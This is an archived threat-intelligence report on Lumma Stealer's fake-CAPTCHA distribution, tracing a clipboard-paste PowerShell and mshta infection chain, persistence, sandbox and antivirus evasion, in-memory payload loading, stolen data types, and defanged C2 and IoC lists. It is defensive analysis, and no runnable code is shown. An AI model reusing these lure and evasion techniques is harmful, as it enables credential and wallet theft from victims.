{
	"id": "746cdaa3-7dfc-4fb4-9f02-663e7c666373",
	"created_at": "2026-04-06T01:31:05.345676Z",
	"updated_at": "2026-04-10T03:21:25.475798Z",
	"deleted_at": null,
	"sha1_hash": "7778968af6c6ee437d4c6cbb535dd164b04e0866",
	"title": "Lumma Stealer – Tracking distribution channels",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1493940,
	"plain_text": "Lumma Stealer – Tracking distribution channels\r\nBy Elsayed Elrefaei\r\nPublished: 2025-04-21 · Archived: 2026-04-06 00:35:04 UTC\r\nIntroduction\r\nThe evolution of Malware-as-a-Service (MaaS) has significantly lowered the barriers to entry for cybercriminals,\r\nwith information stealers becoming one of the most commercially successful categories in this underground\r\neconomy. Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its\r\nintroduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information\r\nstealer quickly gained traction in underground forums, with prices starting at $250. As of March 2025, its presence\r\non dark web marketplaces and Telegram channels continues to grow, with over a thousand active subscribers.\r\nLummaC2 seller’s official website\r\nLumma delivery usually involves human interaction, such as clicking a link, running malicious commands, etc.\r\nRecently, while investigating an incident as part of our incident response services, our Global Emergency\r\nResponse Team (GERT) encountered Lumma on a customer’s system. The analysis revealed that the incident was\r\ntriggered by human interaction, namely the user was tricked into executing a malicious command by a fake\r\nCAPTCHA page. In this article, we will review in detail how the fake CAPTCHA campaign works and share a list\r\nof IoCs that we discovered during our analysis and investigation of the campaign. Although we already described\r\nthis distribution method in an earlier article, more details about this campaign have been discovered since then.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 1 of 17\n\nLumma Stealer’s distribution vectors\r\nLumma Stealer’s distribution methods are diverse, using common techniques typically seen in information-stealing malware campaigns. Primary infection vectors include phishing emails with malicious attachments or\r\nlinks, as well as trojanized legitimate applications. These deceptive tactics trick users into executing the malware,\r\nwhich runs silently in the background harvesting valuable data. Lumma has also been observed using exploit kits,\r\nsocial engineering, and compromised websites to extend its reach and evade detection by security solutions. In\r\nthis article, we’ll focus mainly on the fake CAPTCHA distribution vector.\r\nThis vector involves fake verification pages that resemble legitimate services, often hosted on platforms that use\r\nContent Delivery Networks (CDNs). These pages typically masquerade as frequently used CAPTCHAs, such as\r\nGoogle reCAPTCHA or Cloudflare CAPTCHA, to trick users into believing they are interacting with a trusted\r\nservice.\r\nFake CAPTCHA distribution vectors\r\nFake CAPTCHA distribution scheme\r\nThere are two types of resources used to promote fake CAPTCHA pages:\r\nPirated media, adult content, and cracked software sites. The attackers clone these websites and inject\r\nmalicious advertisements into the cloned page that redirect users to a malicious CAPTCHA.\r\nFake Telegram channels for pirated content and cryptocurrencies. The attackers create Telegram\r\nchannels with names containing keywords related to cryptocurrencies or pirated content, such as software,\r\nmovies, etc. When a user searches for such content, the fraudulent channels appear at the top of the search.\r\nThe attackers also use social media posts to lure victims to these channels. When a user joins such a\r\nchannel, they are prompted to complete an identity verification via a fraudulent “Safeguard Captcha” bot.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 2 of 17\n\nSafeguard Captcha bot\r\nOnce the user clicks the Verify button, the bot opens a pop-up page with a fake CAPTCHA.\r\nFake CAPTCHA page\r\nUsers are presented with a pop-up page that looks like a standard CAPTCHA verification, prompting them to click\r\nI’m not a robot/Verify/Copy or some similar button. However, this is where the deception begins.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 3 of 17\n\nFake CAPTCHA page examples\r\nFake page malicious content\r\nWhen the I’m not a robot/Verify/Copy button is clicked, the user is instructed to perform an unusual sequence:\r\nOpen the Run dialog(Win+R)\r\nPress Ctrl+V\r\nHit Enter\r\nWithout the user’s knowledge, clicking the button automatically copies a PowerShell command to the clipboard.\r\nOnce the user pastes the command into the Run dialog and presses Enter, the system executes the command.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 4 of 17\n\nExamples of scripts copied to the clipboard and executed via the Run dialog\r\nThe command may vary slightly from site to site and changes every few days, but it is typically used to download\r\nLumma Stealer from a remote server, which is usually a known CDN with a free trial period or a legitimate code\r\nhosting and collaboration platform such as GitHub, and begin the malware installation process. Let’s take a closer\r\nlook at this infection chain using the following command that was executed in our customer’s incident as an\r\nexample:\r\nCommand triggering Lumma’s infection chain\r\nThe command is rather simple. It decodes and runs the contents from the remote win15.txt file hosted\r\nat https[:]//win15.b-cdn[.]net/win15.txt. The win15.txt file contains a Base64-encoded PowerShell script that then\r\ndownloads and runs the Lumma Stealer. When decoded, the malicious PowerShell script looks like this:\r\nContents of win15.txt\r\nThe script performs the following actions:\r\n1. 1 Downloads the malware. It downloads the win15.zip file from https[:]//win15.b-cdn[.]net/win15.zip to [User Profile]\\AppData\\Roaming\\bFylC6zX.zip.\r\n2. 2 Extracts the malware. The downloaded ZIP file is extracted to C:\\Users\\\r\n[User]\\AppData\\Roaming\\7oCDTWYu, a hidden folder under the user’s AppData directory.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 5 of 17\n\n3. 3 Executes the malware. The script runs the Set-up.exe file from the unpacked archive, which is now\r\nlocated at C:\\Users\\[User]\\AppData\\Roaming\\7oCDTWYu\\Set-up.exe.\r\n4. 4 Establishes persistence mechanism. The script creates an entry in the Windows Registry for\r\npersistency, ensuring that the malware runs every time the system starts. The registry key is added under\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run. The key name is 5TQjtTuo, with the value\r\npointing to Set-up.exe.\r\nHowever, in some cases, the malware delivery mechanism can be more complex. In the following example, the\r\ndelivery script is a JavaScript code hidden in what looks like an .mp3 file (other file formats such as .mp4 and .png\r\nhave also been used). In fact, in addition to the JavaScript, the file may contain a corrupt .mp3/.mp4 file,\r\nlegitimate software code, or just random data.\r\nThe script is executed using the Microsoft HTML Application engine mshta.exe by prompting the user to paste the\r\nfollowing command into the Run dialog box:\r\nCommand triggering JS-based infection chain\r\nThe mshta command parses the file as an HTA file (Microsoft HTML Application) and executes any JavaScript\r\ncode within the \u003cscript\u003e tag, triggering the following infection chain:\r\nLayer (1)\r\nThe JS script inside the .mp3 file is executed by mshta.\r\nJS script within the never.mp3 file\r\nLayer (2)\r\nAfter calculating the Kwb value, the following script is obtained, which is then executed by the eval function.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 6 of 17\n\nLayer (2) JS script\r\nLayer (3)\r\nAfter calculating the values for kXN and zzI, the final ActiveX command is built and executed. It contains an\r\nencoded PowerShell script in the $PBwR variable.\r\nDeobfuscated Layer (2) JS script\r\nLayer (4)\r\nAfter decoding the PowerShell script, we found that its main purpose is to download and execute another\r\nPowerShell file from the C2 path hXXps://connect[.]klipfuzj[.]shop/firefire[.]png.\r\nDecrypted Layer (3) PowerShell script\r\nAnalysis for firefire.png\r\nThe file firefire.png is a huge PowerShell file (~31MB) with several layers of obfuscation and anti-debugging.\r\nAfter deobfuscating and removing unnecessary code, we could see that the main purpose of the file is to generate\r\nand execute an encrypted PowerShell script as follows:\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 7 of 17\n\nfirefire.png\r\nThe decryption key is the output of the Invoke-Metasploit command, which is blocked if the AMSI is enabled. As\r\na result, an error message is generated by the AMSI: AMSI_RESULT_NOT_DETECTED, which is used as the key.\r\nIf the AMSI is disabled, the malware will fail to decrypt the script.\r\nThe decrypted PowerShell script is approximately 1.5MB in size and its main purpose is to create and run a\r\nmalicious executable file.\r\nDecrypted PowerShell script\r\nInfection methods and techniques\r\nLumma Stealer has been observed in the wild using a variety of infection methods, with two primary techniques\r\nstanding out in its distribution campaigns: DLL sideloading and injection of a malicious payload into the overlay\r\nsection of legitimate free software. These techniques are particularly effective at evading detection because they\r\nexploit the trust that users place in widely used applications and system processes.\r\nDLL sideloading\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 8 of 17\n\nDLL sideloading is a well-known technique where malicious dynamic link libraries (DLLs) are loaded by a\r\nlegitimate application. This technique exploits vulnerabilities or misconfigurations in software that\r\ninadvertently load DLL files from untrusted directories. Attackers can drop the Lumma Stealer DLL in the\r\nsame directory as a trusted application, causing it to load when the application is executed. Because the\r\nmalicious DLL is loaded in the context of a trusted process, it is much harder for traditional security\r\nmeasures to detect the intrusion.\r\nInjection of malicious payload into the overlay section of software\r\nAnother method commonly used by Lumma Stealer is to inject a malicious payload into the overlay section\r\nof free software. The overlay section is typically used for legitimate software functionality, such as\r\ndisplaying graphical interfaces or handling certain input events. By modifying this section of the software,\r\nthe adversary can inject the malicious payload without disrupting the normal operation of the application.\r\nThis method is particularly insidious because the software continues to appear legitimate while the\r\nmalicious code silently executes in the background. It also helps the malware evade detection by security\r\ntools that focus on system-level monitoring.\r\nBoth of these methods rely on exploiting trusted applications, which significantly increases the chances of\r\nsuccessful infection. These techniques can be used in combination with others, such as phishing or trojanized\r\nsoftware bundles, to maximize the spread of Lumma Stealer to multiple targets.\r\nSample analysis\r\nTo demonstrate how the Lumma Stealer installers work and the impact on systems and data security, we’ll analyze\r\nthe stealer sample we found in the incident at our customer. This sample utilizes the overlay injection technique.\r\nBelow is a detailed breakdown of the infection chain and the various techniques used to deploy and execute\r\nLumma Stealer.\r\nInitial execution and self-extracting RAR (SFX)\r\nThe initial payload in this sample is delivered as ProjectorNebraska.exe, which consists of a corrupt legitimate file\r\nand the malware in the overlay section. It is executed by the victim. Upon execution, the file extracts and runs a\r\nself-extracting RAR (SFX) archive. This archive contains the next stage of the infection: a Nullsoft Scriptable\r\nInstall System (NSIS) installer. NSIS is a widely used tool for creating Windows installers.\r\nNSIS installer components\r\nThe NSIS installer drops several components that are critical to the malware’s execution:\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 9 of 17\n\nNSIS installer components\r\nThese include AutoIt components and an obfuscated batch script loader named Hose.cmd. The following AutoIt\r\ncomponents are dropped:\r\nFragments of a legitimate AutoIt executable: These are pieces of a genuine AutoIt executable that are\r\ndropped to the victim’s system, and then reassembled during the infection process.\r\nCompiled AutoIt script: The compiled script carries the core functionality of Lumma Stealer, including\r\noperations such as credential theft and data exfiltration.\r\nThese components are later reassembled into the final executable payload using the batch script loader that\r\nconcatenates and executes the various fragments.\r\nHose.cmd orchestrates the final steps of the malware’s execution. Below is a breakdown of its key components\r\n(after deobfuscation):\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 10 of 17\n\nDeobfuscated batch script code\r\nProcess tree after executing the batch script\r\nThe batch script performs the following actions:\r\nSecurity product evasion\r\nThe script scans for the presence of security software (SecureAnywhere and Quick Heal AntiVirus)\r\nusing the tasklist If either of them is detected, it delays execution via the ping -n 198 command,\r\nwhich pings localhost 198 times. This trick is used to avoid sandbox detection, as the sandbox\r\ntypically exits before the script completes the ping task.\r\nThe script checks for the presence of any of the following: Avast, AVG, McAfee, Bitdefender,\r\nSophos, using the tasklist If one of them is detected, it keeps the executable name for AutoIt as\r\nAutoIt3.exe; otherwise, it renames it to Suggests.pif.\r\nEnvironment setup and payload preparation. It sets environment variables for the AutoIt executable and\r\nthe final payload. It also creates a working directory named 195402 in the Temp directory to store\r\nmalicious components.\r\nObfuscation and extraction. The script filters and cleans a file named Sitting from the NSIS installer by\r\nremoving the string OptimumSlipProfessionalsPerspective, and storing the result as Suggests.pif. It then\r\nuses the copy /b command to merge Suggests.pif with an additional component from the NSIS installer\r\nnamed Oclc into the AutoIt executable, saving it again as Suggests.pif.\r\nPayload assembly. It concatenates multiple files from the NSIS installer: Italy, Holmes, True, etc. to\r\ngenerate the final executable with the name h.a3x, which is an AutoIt script.\r\nExecution of Lumma Stealer. Finally, the script runs Suggests.pif, which in turn executes h.a3x, triggering\r\nthe AutoIt-based execution of Lumma Stealer.\r\nAutoIt script analysis\r\nDuring the analysis, the AutoIt Extractor utility was used to decompile and extract the script from the h.a3x file.\r\nThe script was heavily obfuscated and required additional deobfuscation to get a clean and analyzable .au3 script.\r\nBelow is the analysis of the AutoIt loader’s behavior.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 11 of 17\n\nAutoIt script extraction\r\nAnti-analysis checks\r\nThe script begins by validating the environment to detect analysis tools or sandbox environments. It checks for\r\nspecific computer names and usernames often associated with testing environments.\r\nEnvironment validation\r\nIt then checks for processes from popular antivirus tools such as Avast (avastui.exe), Bitdefender (bdagent.exe),\r\nand Kaspersky (avp.exe).\r\nAnti-AV checks\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 12 of 17\n\nIf any of these conditions are met, the script halts execution to evade detection.\r\nExecuting loader shellcode\r\nIf the anti-analysis checks are passed, the script dynamically selects 32-bit or 64-bit shellcode based on the system\r\narchitecture, which is located in the $vinylcigaretteau variable inside the script. To do this, it allocates executable\r\nmemory and injects the shellcode into it. The shellcode then initializes the execution environment and prepares for\r\nthe second-stage payload.\r\nPart of the AutoIt loader responsible for the shellcode execution\r\nProcessing the $dayjoy payload\r\nAfter executing the loader shellcode, the script processes the second-stage payload located in the $dayjoy variable.\r\nThe payload is decrypted using RC4 with a hardcoded key 1246403907690944.\r\nThe encrypted payload\r\nTo decrypt the payload independently, we wrote a custom Python script that you can see in the screenshot below.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 13 of 17\n\nPython script for payload decryption\r\nThe decrypted payload is decompressed using the LZNT1 algorithm.\r\nPayload decompression\r\nFinal payload execution\r\nAfter decryption and decompression, the $dayjoy payload is executed in memory. The script\r\nuses DllCallAddress to invoke the payload directly in the allocated memory. This ensures the payload is executed\r\nstealthily without being written to disk.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 14 of 17\n\nFinal payload execution\r\nThis final payload is the stealer itself. The malware’s comprehensive data theft capabilities target a wide range of\r\nsensitive information, including:\r\nCryptocurrency wallet credentials (e.g., Binance, Ethereum) and associated browser extensions (e.g.,\r\nMetaMask)\r\nTwo-factor authentication (2FA) data and authenticator extensions\r\nBrowser-stored credentials and cookies\r\nStored credentials from remote access tools such as AnyDesk\r\nStored credentials from password managers such as KeePass\r\nSystem and application data\r\nFinancial information such as credit card numbers\r\nC2 communication\r\nOnce Lumma Stealer is executed, it establishes communication with its command and control (C2) servers to\r\nexfiltrate the stolen data. The malware sends the collected information back to the attacker’s infrastructure for\r\nfurther exploitation. This communication is typically performed over HTTP or HTTPS, often disguised as\r\nlegitimate traffic to avoid detection by network security monitoring tools.\r\nC2 servers identified\r\nThe following C2 domains used by Lumma Stealer to communicate with the attackers were identified in the\r\nanalyzed sample:\r\nreinforcenh[.]shop\r\nstogeneratmns[.]shop\r\nfragnantbui[.]shop\r\ndrawzhotdog[.]shop\r\nvozmeatillu[.]shop\r\noffensivedzvju[.]shop\r\nghostreedmnu[.]shop\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 15 of 17\n\ngutterydhowi[.]shop\r\nThese domains are used to receive stolen data from infected systems. Communication with these servers is\r\ntypically via encrypted HTTP POST requests.\r\nConclusions\r\nAs a mass-distributed malicious program, Lumma Stealer employs a complex infection chain that includes a\r\nnumber of anti-analysis and detection evasion techniques, to stealthily infiltrate the victim’s device. Although the\r\ninitial infection via dubious pirated software and cryptocurrency-related websites and Telegram channels suggests\r\nthat individuals are the primary targets of these attacks, we saw Lumma in an incident at one of our customers,\r\nwhich illustrates that organizations can also fall victim to this threat. The information stolen by such malware may\r\nend up in the hands of more prominent cybercriminals, such as ransomware operators. That’s why it’s important to\r\nprevent stealer infections at the early stages. By understanding the infection techniques, security professionals can\r\nbetter defend against this growing threat and develop more effective detection and prevention strategies.\r\nIoCs\r\nThe following list contains the URLs detected during our research. Note that the attackers change the malicious\r\nURLs and Telegram channels almost daily, and the IoCs provided in this section were already inactive at the time\r\nof writing. However, they may be useful for retrospective threat detection.\r\nMalicious fake CAPTCHA pages\r\nseenga[.]com/page/confirm.html\r\nserviceverifcaptcho[.]com\r\ndownloadsbeta[.]com\r\nintelligenceadx[.]com\r\ndownloadstep[.]com\r\nnannyirrationalacquainted[.]com\r\nsuspectplainrevulsion[.]com\r\nstreamingsplays[.]com\r\nbot-detection-v1.b-cdn[.]net\r\nbot-check-v5.b-cdn[.]net\r\nspam-verification.b-cdn[.]net\r\nhuman-test.b-cdn[.]net\r\nb-cdn[.]net\r\nb-cdn[.]net\r\nTelegram channels distributing Lumma\r\nt[.]me/hitbase\r\nt[.]me/sharmamod\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 16 of 17\n\nSource: https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/"
	],
	"report_names": [
		"116274"
	],
	"threat_actors": [],
	"ts_created_at": 1775439065,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7778968af6c6ee437d4c6cbb535dd164b04e0866.pdf",
		"text": "https://archive.orkl.eu/7778968af6c6ee437d4c6cbb535dd164b04e0866.txt",
		"img": "https://archive.orkl.eu/7778968af6c6ee437d4c6cbb535dd164b04e0866.jpg"
	}
}